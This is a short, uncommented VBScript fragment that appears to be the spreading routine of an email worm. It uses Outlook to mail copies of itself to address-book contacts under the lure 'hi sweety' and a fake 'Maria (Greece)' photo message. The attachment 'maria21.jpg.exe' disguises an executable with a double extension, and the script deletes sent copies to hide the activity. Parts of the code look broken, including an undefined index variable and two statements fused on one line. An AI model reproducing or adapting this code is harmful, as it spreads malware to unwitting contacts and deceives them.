Set UtWHdSg=CreateObject("Outlook.Application")
For gAeRkYe=1 To 460
Set rRDKMEs=UtWHdSg.CreateItem(0)
rRDKMEs.To = UtWHdSg.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
rRDKMEs.Subject = "hi sweety"
Set tJTfgCN = "C:\Windows\maria21.jpg.exe"
rRDKMEs.Attachments.Add (tJTfgCN)
rRDKMEs.Body = "hey how are you?" & vbcrlf & "do you remember me? you asked me for a foto last week..." & vbcrlf & "well here it is!" & vbcrlf & "" & vbcrlf & "cu" & vbcrlf & "Maria (Greece)"rRDKMEs.DeleteAfterSubmit = True
if rRDKMEs.To <> "" then rRDKMEs.Send
Next
UtWHdSg.Quit
